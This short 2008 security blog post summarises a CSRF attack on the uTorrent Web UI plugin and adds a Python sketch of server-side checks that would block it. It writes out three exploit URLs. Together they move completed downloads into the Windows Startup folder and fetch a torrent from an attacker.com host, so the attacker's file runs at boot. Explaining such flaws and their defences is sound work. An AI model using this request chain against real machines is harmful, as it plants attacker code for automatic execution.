
Own a box via CSRF

by rd last modified 2008-05-09 05:18

Bored of seeing CSRF issues every day? This one is a bit more interesting.


Rob Carter has posted a blog entry on how to pwn a box via a pure CSRF bug in a uTorrent plugin. When a user installs the uTorrent Web UI plugin, the plugin starts a web server running locally on the user's machine. Basically, his CSRF exploit forces uTorrent to move completed downloads to an arbitrary directory on the victim's system, download arbitrary torrents, and completely own the box.


  • The first CSRF turns on the “Move completed downloads” option in the uTorrent Web UI:
    http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=1

  • The second CSRF changes the path where completed torrent downloads are placed. For example:
    http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:\Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup

  • The last CSRF forces the victim to download a torrent that points to an attacker-controlled file. Once the file has been downloaded via the torrent, uTorrent places it in the Startup folder, and it runs automatically at the next Windows boot.
    http://localhost:14774/gui/?action=add-url&s=http://www.attacker.com/file.torrent
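All three requests above succeed because the Web UI changes state on a plain GET that carries nothing a third-party page cannot supply. The sketch below is an added example, not code from Rob Carter's post or from uTorrent, and it makes no claim about how uTorrent itself was fixed. It shows a server-side check that would refuse them; `check_request`, `origin_of` and the `X-UI-Token` header are hypothetical names chosen for illustration.

```python
import hmac
from urllib.parse import urlsplit, parse_qs

# Actions taken from the three URLs in the post; both change server state.
STATE_CHANGING = {"setsetting", "add-url"}
# Assumption: the Web UI is served from this origin (port taken from the post).
UI_ORIGIN = "http://localhost:14774"


def origin_of(url):
    """Return scheme://host[:port] of a URL, or '' if it has no origin."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" if parts.scheme and parts.netloc else ""


def check_request(method, url, headers, session_token):
    """Return (allowed, reason) for one request to the local Web UI."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    action = query.get("action", [""])[0]
    if action not in STATE_CHANGING:
        return True, "read-only"
    if method != "POST":
        return False, "state change over " + method
    # Prefer Origin, fall back to Referer; a missing value is treated as cross-site.
    source = headers.get("Origin") or origin_of(headers.get("Referer", ""))
    if source != UI_ORIGIN:
        return False, "cross-site or missing origin"
    # Hypothetical header carrying a per-session secret that a page on
    # another origin can neither read nor attach to a simple request.
    supplied = headers.get("X-UI-Token", "")
    if not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return False, "bad token"
    return True, "ok"


# Constructed sample: two of the URLs from the post, as a browser would send
# them while the user views a page on another site.
POST_URLS = [
    UI_ORIGIN + "/gui/?action=setsetting&s=dir_completed_download_flag&v=1",
    UI_ORIGIN + "/gui/?action=add-url&s=http://www.attacker.com/file.torrent",
]

if __name__ == "__main__":
    token = "constructed-session-token"
    for u in POST_URLS:
        print(check_request("GET", u, {"Referer": "http://www.attacker.com/"}, token))
    own = {"Origin": UI_ORIGIN, "X-UI-Token": token}
    print(check_request("POST", POST_URLS[0], own, token))
```

Any one of the three checks stops the requests in the post; layering them keeps the UI protected when a browser omits `Origin` or a proxy strips `Referer`.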



